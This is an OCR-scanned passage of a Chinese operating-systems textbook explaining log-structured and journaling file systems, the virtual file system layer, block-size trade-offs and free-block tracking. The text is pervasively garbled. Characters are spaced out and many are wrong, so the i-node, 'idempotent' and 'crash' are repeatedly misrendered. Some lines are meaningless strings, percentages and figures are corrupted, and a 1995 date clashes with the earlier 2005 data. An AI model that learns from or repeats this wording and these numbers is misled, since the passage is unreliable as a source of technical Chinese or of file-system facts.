在 LFS 的 设计 中 ， 同 样 存在 着 i 太 点 ， 且 具有 与 UNIX 中 一 样 的 结 
构 ， 但 是 i 市 点 分 散在 整个 日 志 中 ， 而 不 是 放 在 磁盘 的 某 一 个 固定 位 
置 。 尽 管 如 此 ， 当 一 个 ji 节点 被 定位 后 ， 定 位 一 个 块 就 用 通常 的 方式 来 
完成 。 当 然 ， 由 于 这 种 设计 ， 权 在 磁盘 中 找到 一 个 i 贡 点 台 变 得 比较 困 
难 了 ， 因 为 节点 的 地 址 不 能 像 在 UNIX 中 那样 简单 地 通过 计算 得 到 。 
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部 分 还 是 在 内 存 中 。 


总 而 言 之 ， 所 有 的 写 操作 最 初 都 被 缓冲 在 内 存 中 ， 然 后 周期 性 地 
把 所 有 已 缓冲 的 写作 为 一 个 单独 的 段 ， 在 日 志 的 末尾 处 写 入 位 盘 。 要 
打开 一 个 文件 ， 则 首先 需要 从 i 贡 点 图 中 找到 文件 的 i 节 点。 一 旦 i 氮 
定位 之 后 束 可 以 找到 相应 的 块 的 地 址 。 所 有 的 块 都 放 在 段 中 ， 在 日 志 
的 某 个 位 置 上 。 


如 有 条 磁盘 空间 无 限 大 ， 那 么 有 了 前 面 的 讨论 吏 足 够 了 。 但 是 ， 实 
际 的 硬盘 空间 是 有 限 的 ， 这 样 最 终日 志 将 会 占用 整个 磁盘 ， 到 那个 时 
候 将 不 能 往日 志 中 写 任 何 新 的 段 。 笠 运 的 是 ， 许 多 已 有 的 段 包 含 了 很 
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为 了 解决 这 个 问题 ，LFS 有 一 个 清理 线程 ， 该 清理 线程 周期 地 扫 
描 日 志 进 行 磁 表 压 缩 。 该 线程 首先 读 日 志 中 的 第 一 个 段 的 摘要 ， 检 查 
有 哪些 i 太 点 和 文件 。 然 后 该 线程 查看 当前 i 节点 图 ， 判 断 该 市 点 是 否 
有 效 以 及 文件 块 是 否 仍 在 使 用 中 。 如 果 没 有 使 用 ， 则 该 信息 被 丢弃 。 
如 果 仍 然 使 用 ， 那 么 i 节 点 和 块 吕 进入 内 存 等 竺 写 回 到 下 一 个 段 中 。 接 
着 ， 原 来 的 段 补 标记 为 空间 ， 以 便 日 志 可 以 用 它 来 存放 新 的 数据 。 用 


这 种 方法 ， 清 理 线 程 志 历 日 志 ， 从 后 面 移 走 旧 的 段 ， 然 后 将 有 效 的 数 
据 放 入 内 存 等 待 写 到 下 一 个 段 中 。 由 此 ， 整 个 磁盘 成 为 一 个 大 的 环形 
的 缓冲 区 ， 写 线程 将 新 的 段 写 到 前 面 ， 而 清理 线程 则 将 旧 的 段 从 后 面 
移 走 。 


日 志 的 管理 并 不 人 简单， 因为 当 一 个 文件 块 被 写 回 到 一 个 新 段 的 时 
候 ， 该 文件 的 i 节点 (在 日 志 的 某 个 地 方 ， 必须 首先 要 和 定位、 更 新 ， 然 
后 放 到 内 存 中 准备 写 回 到 下 一 个 段 中 。i 节 把 图 接着 必须 更 新 以 指 癌 新 
的 位 置 。 尽 管 如 此 ， 对 日 志 进 行 管理 还 是 可 行 的 ， 而 且 性 能 分 析 的 结 
果 表 明 ， 这 种 由 管理 而 市 来 的 复 洒 性 是 值得 的 。 在 上 面 所 引用 文 草 中 
的 测试 数据 表明 ，LFS 在 处 理 大 量 的 零碎 的 写 操作 时 性 能 上 优 于 
UNIX， 而 在 读 和 大 块 写 操作 的 性 能 方面 并 不 比 UNIX 文 件 系统 兰 ， 其 
至 更 好 。 


4.3.6 日 志文 件 系统 


虽然 基于 日 志 结 构 的 文件 系统 是 一 个 很 吸引 人 的 想法 ， 但 是 由 于 
它们 和 现 有 的 文件 系统 不 相 匹配 ， 所 以 还 没有 被 广泛 应 用 。 尽 管 如 
此 ， 它 们 内 在 的 一 个 思想 ， 即 面 对 出 错 的 鲁 棒 性 ， 却 可 以 被 其 他 文件 
系统 所 借鉴 。 这 里 的 基本 想法 是 保存 一 个 用 于 记录 系统 下 一 步 将 要 做 
什么 的 日 志 。 这 样 当 系统 在 完成 它们 即将 完成 的 任务 前 前 误 时 ， 重 新 
启动 后 ， 可 以 通过 查看 日 志 ， 获 取 月 演 前 计划 完成 的 任务 ， 并 完成 它 
们 。 这 样 的 文件 系统 被 称 为 日 志文 件 系 统 ， 并 已 经 被 实际 应 用 。 微 软 
(Microsoft) 的 NTFS 文 件 系 统 、Linux ext3 和 ReiserFS 文 件 系 统 都 使 用 


日 志 。 接 下 来 ， 我 们 会 对 这 个 话题 进行 简短 介绍 。 


为 了 看 清 这 个 问题 的 实质 ， 考 虑 一 个 简单 、 普 通 并 经 稼 发 生 的 操 
VE: 移 除 文件 。 这 个 操作 (在 UNIX 中 ) 需要 三 个 步骤 完成 : 


1) 在 目录 中 删除 文件 ; 
2) 释 放 i 市 点 到 空闲 i 市 点 池 ; 
3) 将 所 有 磁盘 块 归还 空闲 磁 副 块 池 。 


在 Windows 中 ， 也 需要 类 似 的 步 又 。 不 存在 系统 朋 溃 时 ， 这 些 步 
又 执行 的 顺序 不 会 市 来 问题 ， 但 古 当 存在 系统 有 衣 江 时 ， 束 会 涡 来 问 
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获得 ， 也 不 会 被 再 分 配 ， 它 们 只 存在 于 废物 池 中 的 某 个 地 方 ， 并 因此 
减少 了 可 利用 的 资源 。 如 果 朋 潢 发生 在 第 二 步 后 ， 那 么 只 有 了 磁 副 块 会 
ERS 


如 采 操 作 顺 序 被 更 改 ， 并 且 iT 点 最 移 被 释放 ， 这 样 在 系统 重 局 
后 ，i 和 总 可 以 被 再 分 配 ， 但 是 旧 的 目 永 入 口 将 继续 指 癌 它 ， 因 此 指 同 
错误 文件 。 如 果 磁 一 块 最 先 被 释放 ， 这 样 一 个 在 iT 点 被 清除 前 的 系统 
般 种 将 意味 着 一 个 有 效 的 目 孙 入 口 指 回 一 个 放 点 ， 它 所 列 出 的 磁 僵 块 
当前 存在 于 空 几 块 存储 池 中 并 可 能 很 快 被 再 利用 。 这 将 导致 两 个 或 更 
多 的 文件 分 至 同样 的 磁盘 块 。 这 样 的 结 末 都 古 不 好 的 。 


日 志文 件 系统 则 先 写 一 个 日 志 项 ， 列 出 三 个 将 要 完成 的 动作 。 人 然 
后 日 志 项 被 写 入 磁盘 “并且 为 了 良好 地 实施 ， 可 能 从 磁盘 读 回来 验证 
它 的 完整 性 ) 。 只 有 当日 志 项 已 经 被 写 入 ， 不 同 的 操作 才 可 以 进行 。 
当 所 有 的 操作 成 功 完成 后 ， 擦 除 日 志 项 。 如 采 系 统 这 时 朋 并 ， 系 统 恢 
复 后 ， 文 件 系 统 可 以 通过 检查 日 志 来 查看 是 不 是 有 未 完成 的 操作 。 如 
果 有 ， 可 以 重新 运行 所 有 未 完成 的 操作 (这 个 过 程 在 系统 骨 演 重复 发 
生 时 执行 多 次 ) ， 直 到 文件 被 正确 地 删除 。 


为 了 让 日 志文 件 系统 工作 ， 被 写 入 日 志 的 操作 必须 是 几 等 的 ， 它 
意味 着 只 要 有 必要 ， 它 们 吏 可 以 重复 执行 很 多 次 ， 并 不 会 冲 来 破坏 。 
像 操 作 “ 更 新 位 表 并 标记 iT 点 k 或 者 块 np 是 至 朵 的 "可 以 重复 任意 次 。 同 


样 地 ， 查 找 一 个 目录 并 且 删 除 所 有 叫 foobar 的 项 也 是 器 等 的 。 在 男 一 
方面 ， 把 从 i 点 k 新 释放 的 块 加 入 空闲 表 的 末端 不 是 时 等 的 ， 因 为 它 
们 可 能 已 经 被 释放 并 存放 在 那里 了 。 更 复杂 的 操作 如 “查找 空闲 块 列表 
并 且 如 采 块 n 不 在 列表 藉 将 块 n 加 入 ?是 央 等 的 。 日 志文 件 系统 必须 安排 
它们 的 数据 结构 和 可 写 入 日 志 的 操作 以 使 它们 都 是 需 等 的 。 在 这 些 条 
件 下 ， 朋 演 恢 复 可 以 被 快速 安全 地 实施 。 


为 了 增加 可 信 性 ， 一 个 文件 系统 可 以 引入 数据 库 中 原子 事务 
(atomic transaction) 的 概念 。 使 用 这 个 概念 ， 一 组 动作 可 以 被 界定 在 
开始 事务 和 结束 事务 操作 之 间 。 这 样 ， 文 件 系 统 束 会 知道 它 必须 完成 
所 有 被 界定 的 操作 ， 或 者 什么 也 不 做 ， 但 是 没有 其 他 的 选择 。 


NTEFS 有 一 个 扩展 的 日 志文 件 系统 ， 并 且 它 的 结构 几乎 不 会 因 系统 
裔 溃 而 受到 破坏 。 目 1993 年 NTFS 第 一 次 随 Windows NT 一 起 发 行 以 来 
就 在 不 断 地 发 展 。Linux 上 有 日 志 功 能 的 第 一 个 文件 系统 是 ReiserFS , 
但 是 因为 它 和 后 来 标准 化 的 ext2 文 件 系 统 不 相 匹 配 ， 它 的 推广 受到 阻 
碍 。 相 比 之 下 ，ext3 一 一 一 个 不 像 ReiserFS 那 么 有 野心 的 工程 ， 也 具有 
日 志文 件 功能 并 且 和 之 前 的 ext2 系 统 可 以 共存 。 


4.3.7 ”虚拟 文件 系统 


即使 在 同一 台 计 算 机 上 同一 个 操作 系统 下 ， 也 会 使 用 很 多 不 同 的 
文件 系统 。 一 个 Windows 可 能 有 一 个 主要 的 NTFS 文 件 系统 ， 但 是 也 有 
继承 的 FAT-32 或 者 FAT-16 驱 动 ， 或 包含 旧 的 但 仍 被 使 用 的 数据 的 分 
区 ， 并 且 不 时 地 也 可 能 需要 一 个 CD-ROM 或 者 DVD (每 一 个 包含 它们 
特有 的 文件 系统 ) 。Windows 通 过 指定 不 同 的 盘 符 来 处 理 这 些 不 同 的 文 
件 系统 ， 比 如 “C:*、“D:” 等 。 当 一 个 进程 打开 一 个 文件 ， 盘 符 是 显 式 或 
者 隐 式 存在 的 ， 所 以 Windows 知 道 向 哪个 文件 系统 传递 请 求 ， 不 需要 尝 
试 将 不 同类 型 文件 系统 整合 为 统一 模式 。 


相 比 之 下 ， 所 有 现代 的 UNIX 系 统 做 了 一 个 很 认真 的 尝试 ， 即 将 多 
种 文件 系统 整合 到 一 个 统一 的 结构 中 。 一 个 Linux 系 统 可 以 用 ext2 作 为 
根 文件 系统 ，ext3 分 区 装载 在 /home 下 ， 男 一 块 采用 ReiserFS 文 件 系 统 
的 硬盘 装载 在 home 下 ， 以 及 一 个 ISO 9660 的 CD-ROMI 临 时 装载 在 /mnt 
下 。 从 用 户 的 观点 来 看 ， 那 只 有 一 个 文件 系统 层级 。 它 们 事实 上 是 多 
种 (不 相 容 的 ) 文件 系统 ， 对 于 用 户 和 进程 是 不 可 见 的 。 


但 是 ， 多 种 文件 系统 的 存在 ， 在 实际 应 用 中 是 明确 可 见 的 ， 而 且 
因为 先前 Sun 公 司 (Kleiman,1986) 所 做 的 工作 ， 绝 大 多 数 UNIX 操 作 系 
统 都 使 用 虚拟 文件 系统 (Virtual File System, VFS) 概念 尝试 将 多 种 文 
件 系统 统一 成 一 个 有 序 的 框架 。 关 键 的 思想 就 是 抽象 出 所 有 文件 系统 


都 共有 的 部 分 ， 并 且 将 这 部 分 代码 放 在 单独 的 一 层 ， 该 层 调 用 底层 的 
实际 文件 系统 来 具体 管理 数据 。 大 体 上 的 结构 在 图 4-18 中 有 阐述 。 以 下 
的 介绍 不 是 单独 针对 Linux 和 FreeBSD 或 者 其 他 版 本 的 UNIX， 而 是 给 出 
了 一 种 普遍 的 关于 UNIX 下 文件 系统 的 描述 。 


用 户 进程 


文件 系统 


和 高速 缓冲 区 


图 4-18 虚拟 文件 系统 的 位 置 


所 有 和 文件 相关 的 系统 调用 在 最 初 的 处 理 上 都 指向 虚拟 文件 系 
统 。 这 些 来 自用 户 进 程 的 调用 ， 都 是 标准 的 POSIX 系 统 调用 ， 比 如 
open ` read write 和 lseek 等 。 因 此 ， 虚 拟 文 件 系统 对 用 户 进 程 有 一 个 “更 
高 层 ” 接 口 ， 它 就 是 著名 的 POSIX 接 口 。 


VFS 也 有 一 个 对 于 实际 文件 系统 的 “更 低层 ”接口 ， 束 是 在 图 4-18 中 
被 标记 为 VFS 接 口 的 部 分 。 这 个 接口 包含 许多 功能 调用 ， 这 样 VFS 可 以 
使 每 一 个 文件 系统 完成 任务 。 因 此 ， 当 创造 一 个 新 的 文件 系统 和 VFS 一 


起 工作 时 ， 新 文件 系统 的 设计 者 就 必须 确定 它 提供 VFS 所 需要 的 功能 调 
用 。 关 于 这 个 功能 的 一 个 明显 的 例子 就 是 从 磁盘 中 读 某 个 特定 的 块 ， 

把 它 放 在 文件 系统 的 高 速 绥 冲 中 ， 并 且 返 回 指向 它 的 指针 。 因 此 ，VEFS 
有 两 个 不 同 的 接口 : 上层 给 用 户 进 程 的 接口 和 下 层 给 实际 文件 系统 的 
接口 。 


尽管 VFS 下 大 多 数 的 文件 系统 体现 了 本 地 磁 如 的 划分 ， 但 并 不 总 是 
这 样 。 事 实 上 ，Sun 建 并 虚拟 文件 系统 最 原始 的 动机 是 支持 使 用 NFS 
(Network File System， 网 络 文 件 系 统 ) 协议 的 远程 文件 系统 。VFS 设 
计 是 只 要 实际 的 文件 系统 提供 VFS 需 要 的 功能 ，VFS 就 不 需 知 道 或 者 关 
心 数据 具体 存 人 铺 在 什么 地 方 或 者 底层 的 文件 系统 是 什么 样 的 。 


大 多 数 VFS 应 用 本 质 上 都 是 面向 对 象 的 ， 即 便 它们 用 C 语 言 而 不 是 
C++ 编 写 。 有 几 种 通常 支持 的 主要 的 对 象 类 型 ， 包 括 超 块 (描述 文件 系 
JO vR (描述 文件 ， 和 目录 (描述 文件 系统 目录 ) 。 这 些 中 的 每 
一 个 部 有 实际 文件 系统 必须 支持 的 相关 操作 。 男 外 ，VFS 有 一 些 供 它 日 
己 使 用 的 内 部 数据 结构 ， 包 括 用 于 跟 踊 用户 进程 中 所 有 打开 文件 的 闭 
载 表 和 文件 摘 述 符 的 数组 。 


为 了 理解 VFS 是 如 何 工作 的 ， 让 我 们 按时 间 的 先后 举 一 个 例子 。 当 
系统 局 动 时 ， 根 文件 系统 在 VFS 中 注册 。 男 外 ， 当 装载 其 他 文件 系统 
时 ， 不 管 在 启动 时 还 古 在 操作 过 程 中 ， 它 们 也 必须 在 VFS 中 注册 。 当 一 
个 文件 系统 注册 时 ， 它 做 的 最 基本 的 工作 就 是 提供 一 个 包 售 VFS 所 需要 


的 函数 地 址 的 列表 ， 可 以 是 一 个 长 的 调用 矢量 ( 表 ) ， 或 者 是 许多 这 
样 的 矢量 (如 果 VFS 需 要 ) ， 每 个 VFS 对 象 一 个 。 因 此 ， 只 要 一 个 文件 
系统 在 VFS 注 册 ，VFS 束 知道 如 何 从 它 那 里 读 一 个 块 一 一 它 从 文件 系统 
提供 的 矢量 中 直接 调用 第 4 个 (或 者 任何 一 个 ) 功能 。 同 样 地 ，VFS 也 
知道 如 何 执 行 实 际 文件 系统 提供 的 每 一 个 其 他 的 功能 ， 它 只 需 调用 茶 
个 功能 ， 该 功能 所 在 的 地 址 在 文件 系统 注册 时 殉 提 供 了 。 


装载 文件 系统 后 束 可 以 使 用 它 了 。 比 如 ， 如 果 一 个 文件 系统 装载 
在 /sr 并且 一 个 进程 调用 它 : 


open("/usr/include/unistd.h",O_RDONLY) 


当 解 析 路 径 时 ，VFS 看 到 新 的 文件 系统 被 装载 在 /usr， 并 且 通 过 搜 
索 已 经 装载 文件 的 超 块 表 来 确定 它 的 超 块 。 做 完 这 些 ， 它 可 以 找到 它 
所 装载 的 文件 的 根 目 永 ， 在 那里 查找 路 径 include/unistd.h。 然 后 VFS 创 
建 一 个 vT 点 并 调用 实际 文件 系统 ， 以 返回 所 有 的 在 文件 ji 点 中 的 信 
息 。 这 个 信息 被 和 其 他 信息 一 起 复制 到 v 节 点 中 (在 RAM 中 ) ， 而 这 些 
言 息 中 最 重要 的 是 指向 包含 调用 v 节 点 操作 的 功能 表 的 指针 ， 比 如 


read、write 和 close 等 。 


当 v 世 点 被 创建 以 后 ，VEFS 在 文件 描述 符 表 中 为 调用 进程 创建 一 个 
入 口 ， 并 且 将 它 指向 一 个 新 的 v 节 点 (为 了 简单 ， 文 件 描述 符 实际 上 指 
向 另 一 个 包含 当前 文件 位 置 和 指向 vT 点 的 指针 的 数据 结构 ， 但 是 这 个 


细节 对 于 我 们 这 里 的 陈述 并 不 重要 ) 。 最 后 ，VFS 向 调用 者 返回 文件 描 
述 符 ， 所 以 调用 者 可 以 用 它 去 读 、 写 或 者 关闭 文件 。 


随后 ， 当 进程 用 文件 搬 述 和 从 进行 一 个 读 操 作 ，VFS 通 过 进程 表 和 文 
件 插 述 符 表 确定 v 廊 点 的 位 置 ， 并 跟随 指针 指向 功能 表 (所 有 这 些 都 是 
被 请 求 文件 所 在 的 实际 文件 系统 中 的 地 址 ) 。 这 样 就 调用 了 处 理 read 的 
功能 ， 在 实际 文件 系统 中 的 代码 运行 并 得 到 所 请 求 的 块 。VFS 并 不 知道 
数据 是 来 源 于 本 地 硬盘， 还 是 来 源 于 网 络 中 的 远程 文件 系统 、CD- 
ROM、USB 存 储 棱 或 者 其 他 介质 。 所 有 有 天 的 数据 结构 在 图 4-19 中 展 
示 。 从 调用 着 进程 号 和 文件 摘 述 符 开 始 ， 进 而 是 v 世 点 ， 读 功能 指针 ， 
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图 4-19. VFS 和 实际 文件 系统 进行 读 操 作 所 使 用 的 数据 结构 和 代码 的 
简化 视图 


通过 这 种 方法 ， 加 入 新 的 文件 系统 变 得 相当 直接 。 为 了 加 入 一 个 
文件 系统 ， 设 计 者 首先 获得 一 个 VEFS 期 待 的 功能 调用 的 列表 ， 人 然后 编写 
文件 系统 实现 这 些 功能 。 或 者 ， 如 采 文 件 系 统 已 经 存在 ， 它 们 必须 提 
供 VFS 需 要 的 包装 功能 ， 通 常 通过 建造 一 个 或 者 多 个 内 在 的 指向 实际 文 
件 系 统 的 调用 来 实现 。 


4.4 文件 系统 管理 和 优化 


B. 
E 


要 使 文件 系统 工作 是 一 件 事 ， 使 真实 世界 中 的 文件 系统 有 效 、 
棒 地 工作 是 另 一 回 事 。 本 和 中 ， 我 们 将 考察 有 天 管理 磁盘 的 一 些 问 


题 o 
4.4.1 磁盘 空间 管理 


文件 通 单 存放 在 磁盘 上 ， 所 以 对 磁 僵 空间 的 管理 是 系统 设计 者 要 
考虑 的 一 个 主要 问题 存储 n 个 字 克 的 文件 可 以 有 两 种 策略 : 分 配 mn 个 
字 世 的 连续 磁 强 空间 ， 或 者 把 文件 分 成 很 多 个 连续 (或 并 不 一 定 连 
续 ) 的 块 。 在 存储 管理 系统 中 ， 分 段 处 理 和 分 页 处 理 之 间 也 要 进行 同 
样 的 权衡 。 


正如 我 们 已 经 见 到 的 ， 按 连续 字 市 序列 存储 文件 有 一 个 明显 问 
题 ， 当 文件 扩大 时 ， 有 可 能 需要 在 磁盘 上 移动 文件 。 内 存 中 分 段 也 有 
同样 的 问题 。 不 同 的 是 ， 相 对 于 把 文件 从 磁盘 的 一 个 位 置 移动 到 男 一 
个 位 置 ， 内 存 中 段 的 移动 操作 要 快 得 多 。 因 此 ， 几 乎 所 有 的 文件 系统 
都 把 文件 分 割 成 固定 大 小 的 块 来 存储 ， 各 块 之 间 不 一 定 相 邻 。 


1. 块 大 小 


一 旦 决定 把 文件 按 固 定 大 小 的 块 来 存储 ， 束 会 出 现 一 个 问题 ， 块 
的 大 小 应 该 是 多 少 ? 按照 磁盘 组 织 方 式 ， 耐 区、 磁道 和 柱 面 显然 都 可 
以 作为 分 配 单位 (虽然 它们 都 与 设备 相关 ， 这 是 一 种 负面 因素 ) 。 在 
分 页 系统 中 ， 页 面 大 小 也 是 主要 讨论 的 问题 之 一 。 


拥有 大 的 块 尺寸 意味 着 每 个 文件 ， 甚 至 一 个 1 字 市 的 文件 ， 都 要 占 
用 一 整个 柱 面 ， 也 就 是 说 小 的 文件 浪费 了 大 量 的 磁盘 空间 。 田 一方 
面 ， 小 的 块 尺寸 意味 着 大 多 数 文件 会 跨越 多 个 块 ， 因 此 需要 多 次 寻 道 
与 旋转 延迟 才能 读 出 它们 ， 从 而 降低 了 性 能 。 因 此 ， 如 果 分 配 的 单元 
太 大 ， 则 浪费 了 空间 ， 如 果 太 小 ， 则 浪费 时 间 。 


做 出 一 个 好 的 决策 需要 知道 有 关 文 件 大 小 分 配 的 信息 。Tanenbaum 
等 人 (2006) 给 出 了 1984 年 及 2005 年 在 一 所 大 型 研究 型 大 学 (VU) 的 
计算 机 系 以 及 一 个 政治 网 站 (www.electoral-vote.com) 的 商业 网 络 服务 
器 上 研究 的 文件 大 小 分 配 数据 。 结 果 显 示 在 图 4-20， 其 中 ， 对 于 每 个 2 
的 客 文 件 大 小 ， 在 3 个 数据 集 里 每 一 数据 集中 的 所 有 小 于 等 于 这 个 值 的 
文件 所 占 的 百分比 被 列 了 出 来 。 例 如 ， 在 2005 年 ，59.13% 的 VU 的 文件 
是 4KB 或 更 小 ， 且 90.84% 的 文件 是 64KB 或 更 小 ， 其 文件 大 小 的 中 间 值 
是 2475 字 有 。 一 些 人 可 能 会 因为 这 么 小 的 尺寸 而 感到 吃惊 。 


VU 1984 


VU 2005 


文件 大 小 | VU 1984 | VU 2005 


99.99 99.99 
99.99 | 100.00 


图 420 小 于 某 个 给 定 值 ( 字 节 ) 的 文件 的 百分比 


我 们 能 从 这 些 数据 中 得 出 什么 结论 呢 ? 如 果 块 大 小 是 IKB， 则 只 
有 309%6 一 50% 的 文件 能 够 放 在 一 个 块 内 ， 但 如 采 块 大 小 是 4KB， 这 一 比 
例 将 上 升 到 609% 一 70%。 那 篇 论文 中 的 其 他 数据 显示 ， 如 采 块 大 小 是 
4KB， 则 93% 的 磁盘 块 会 被 10% 最 大 的 文件 使 用 。 这 意味 着 在 每 个 小 文 
件 末尾 恨 费 一 些 空间 几乎 不 会 有 任何 关系 ， 因 为 磁盘 被 少量 的 大 文件 
(视频 ) 给 占用 了 ， 并 且 小 文件 所 占 空 间 的 总 量 根 本 就 无 关 紧 要 ， 甚 
至 将 那 90% 最 小 的 文件 所 占 的 空间 翻 一 倍 也 不 会 引 人 注 有 目 。 


一 方面 ， 分 配 单位 很 小 意味 着 每 个 文件 由 很 多 块 组 成 ， 每 读 一 
块 都 有 寻 道 和 旋转 延迟 时 间 ， 所 以 ， 读 取 由 很 多 小 块 组 成 的 文件 会 非 


常 慢 


rf | 受 


o 


举例 说 明 ， 假 设 磁盘 每 道 有 1MB， 其 旋转 时 间 为 8.33ms， 平 均 寻 
道 时 间 为 5ms。 以 训 秒 (ms) 为 单位 ， 读 取 一 个 k 个 字 市 的 块 所 需要 的 
时 间 是 寻 道 时 间 、 旋 转 延 返 和 传送 时 间 之 和 |: 


5+4.165+(k/1 000 000)x8.33 


图 4-21 的 虚线 表示 一 个 们 如 的 数据 率 与 块 大 小 之 间 的 函数 天 系 。 要 
计算 空间 利用 率 ， 则 要 对 文件 的 平均 大 小 做 出 假设 。 为 位 单 起 匈 ， 假 
设 所 有 文件 都 是 4KB。 尺 管 这 个 数据 稍微 大 于 在 VU 测量 得 到 的 数据 ， 
但 是 学 生 们 大 概 应 该 有 比 公司 数据 中 心 更 小 的 文件 ， 所 以 这 样 整体 上 
也 许 更 好 些 。 图 4-21 中 的 实 线 表 示 作 为 表 块 大 小 函数 的 空间 利用 率 。 
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图 4-21 虚线 (左边 标 度 ) 给 出 磁盘 数据 率 ， 实 线 (右边 标 度 ) 给 出 
人 磁 副 空间 利用 率 (所 有 文件 大 小 均 为 4KB) 


可 以 按 下面 的 方式 理解 这 两 条 曲线 。 对 一 个 块 的 访问 时 间 完 全 由 
寻 道 时 间 和 旋转 延迟 所 决定 ， 所 以 大 要 伦 费 9ms 的 代价 访问 一 个 盘 块 ， 
那么 取 的 数据 越 多 越 好 。 因 此 ， 数 据 率 随 着 人 磁 强 块 的 增 大 而 增 大 ( 直 
到 传输 花费 很 长 的 时 间 以 至 于 传输 时 间 成 为 主导 因素 ) 。 


现在 考虑 空间 利用 率 。 对 于 4KB 文 件 和 1KB、2KB 或 4KB 的 磁盘 
块 ， 分 别 使 用 4、2、1 块 的 文件 ， 没 有 浪费 。 对 于 8KB 块 以 及 4KB 文 
件 ， 空 间 利用 率 降 至 50%， 而 16KB 块 则 降 至 259%。 实 际 上 ， 很 少 有 文 
件 的 大 小 是 磁 副 块 整数 倍 的 ， 所 以 一 个 文件 的 最 后 一 个 磁盘 块 中 总 是 
有 一 些 空间 浪费 。 


然而 ， 这 些 曲 线 显 示 出 性 能 与 空间 利用 率 天 生 束 是 矛盾 的 。 小 的 
块 会 导致 低 的 性 能 但 是 高 的 空间 利用 率 。 对 于 这 些 数 据 ， 不 存在 合理 
的 折 中 方案 。 在 两 条 曲线 的 相交 处 的 大 小 大 约 是 64KB ， 但 是 数据 〈 传 
W) 速率 只 有 6.6MB/s 并 且 空 间 利 用 率 只 有 大 约 7%， 两 者 都 不 是 很 好 。 
从 历史 观点 上 来 说 ， 文 件 系统 将 大 小 设 在 1~4KB 之 间 ， 但 现在 随 着 磁 
盘 超过 了 1TB， 还 是 将 块 的 大 小 提升 到 64KB 并 且 接 受 浪 费 的 磁盘 空 
间 ， 这 样 也 许 更 好 。 和 磁盘 鹤 间 儿 乎 不 再 会 短缺 了 。 


在 考察 Windows NT 的 文件 使 用 情况 是 否 与 UNIX 的 文件 使 用 情况 存 
在 微小 差别 的 实验 中 ，Vogels 在 康 奈 尔 大 学 对 文件 进行 了 测量 
(Vogels, 1999) 。 他 观察 到 NT 的 文件 使 用 情况 比 UNIX 的 文件 使 用 情 


MARE o MEE: 


当 我 们 在 notepad 文 本 编辑 器 中 输入 一 些 字 符 后 ， 将 内 容 保存 到 一 
个 文件 中 将 触发 26 个 系统 调用 ， 包 括 3 个 失败 的 open 企 图 、1 个 文件 重 
写 和 4 个 打开 和 关闭 序列 。 


尽管 如 此 ， 他 观察 到 了 文件 大 小 的 中 间 值 (以 使 用 情况 作为 权 
重 ) : 只 读 的 为 IKB， 只 写 的 为 2.3KB， 读 写 的 文件 为 4.2KB。 考 虑 到 
数据 集 测量 技术 以 及 年 份 上 的 差异 ， 这 些 结果 与 VU 的 结果 是 相当 吻合 
的 。 


2. 记 有 录 空 内 块 


一 旦 选 定 了 块 大 小 ， 下 一 个 问题 就 是 怎样 跟踪 空闲 块 。 有 两 种 方 
法 被 广泛 采用 ， 如 图 4-22 所 示 。 第 一 种 方法 是 采用 磁盘 块 链 表 ， 每 个 块 
中 包含 尽 可 能 多 的 空闲 磁盘 块 号 。 对 于 1KB 大 小 的 块 和 32 位 的 磁盘 块 
号 ， 空 闲 表 中 每 个 块 包 含有 255 个 空闲 块 的 块 号 (需要 有 一 个 位 置 存放 
指向 下 一 个 块 的 指针 ) 。 考 虑 500GB 的 磁盘 ， 拥 有 488x105 个 块 。 为 了 
在 255 块 中 存放 全 部 这 些 地 址 ， 需 要 190 万 个 块 。 通 常情 况 下 ， 采 用 空 
闲 块 存 放空 闲 表 ， 这 样 存储 器 基本 上 是 空 的 。 


空闲 磁盘 块 16, 17, 18 


1100100011101111 


1 KB 的 磁盘 块 可 以 保存 位 图 
256 个 32 位 磁盘 块 号 
a) b) 


Al 4-22 a) 把 空 闻 表 存 放 在 链表 中 ; b) 位 图 


男 一 种 空 闪 磁盘 空间 管理 的 方法 是 采用 位 图 。n 个 块 的 磁盘 需要 n 
位 位 图 。 在 位 图 中 ， 空 闪 块 用 1 表示 ， 已 分 配 块 用 0 表示 (或 者 反 
之 ) 。 对 于 500GB 人 磁盘 的 例子 ， 需 要 488x105 位 表示 ， 即 需要 60 000 个 
1KB 块 存储 。 很 明显 ， 位 图 方法 所 需 空间 较 少 ， 因 为 每 块 只 用 一 个 二 
进 制 位 标识 ， 相 反 在 链表 方法 中 ， 每 一 块 要 用 到 32 位 。 只 有 在 磁盘 快 
满 时 〈 即 几乎 没有 空闲 块 时 ) 链表 方案 需要 的 块 才 比 位 图 少 。 


如 琳 空 内 块 倾 加 于 成 为 一 个 长 的 连续 分 块 的 话 ， 则 空 几 列表 系统 
可 以 改 成 记录 分 块 而 不 是 单个 的 块 。 一 个 8、16、32 位 的 计数 可 以 与 每 
一 个 块 相关 联 ， 来 记录 连续 空 内 块 的 数目 。 在 最 好 的 情况 下 ， 一 个 基 


AN EAS AEE A LAA PSEA: 第 一 个 空闲 块 的 地 址 ， 以 及 空闲 块 
的 计数 。 男 一 方面 ， 如 果 磁 如 产生 了 很 严重 的 碎片 ， 记 录 分 块 会 比 记 
录 单 独 的 块 效率 要 低 ， 因 为 不 仅 要 存储 地 址 ， 而 且 还 要 存储 计数 。 


这 个 情形 说 明了 操作 系统 设计 者 经 常 遇 到 的 一 个 问题 。 有 许多 数 
据 结 构 与 算法 可 以 用 来 解决 一 个 问题 ， 但 选择 其 中 最 好 的 则 需要 数 
据 ， 而 这 些 数 据 是 设计 者 无 法 预先 拥有 的 ， 只 有 在 系统 被 部 署 完 毕 并 
被 大 量 使 用 后 才 会 获得 。 更 有 其 者 ， 有 些 数 据 可 能 束 古 无 法 获取 。 例 
如 ，1984 年 与 1995 年 我 们 在 VU 测量 的 文件 大 小 、 网 站 的 数据 以 及 在 康 
条 尔 大 学 的 数据 ， 是 仅 有 的 4 个 数据 样本 。 尽 管 有 总 比 什么 都 没有 好 ， 
我 们 仍旧 不 清楚 是 否 这 些 数据 也 可 以 代表 家 用 计算 机 、 公 司 计算 机 、 
政府 计算 机 及 其 他 。 经 过 一 些 努 力 我 们 也 许可 以 获取 一 些 其 他 种 类 计 
算 机 的 样本 ， 但 即使 那样 ， (就 任 这 些 数 据 来 ， 推 断 那 种 测量 适用 于 
所 有 计算 机 也 是 患 苇 的 。 


现在 回 到 空 几 表 方 法 ， 只 需要 在 内 存 中 保存 一 个 指针 块 。 当 文件 
创建 时， 所 需要 的 块 从 指针 块 中 取出 。 现 有 的 指针 块 用 完 时 ， 从 磁 副 
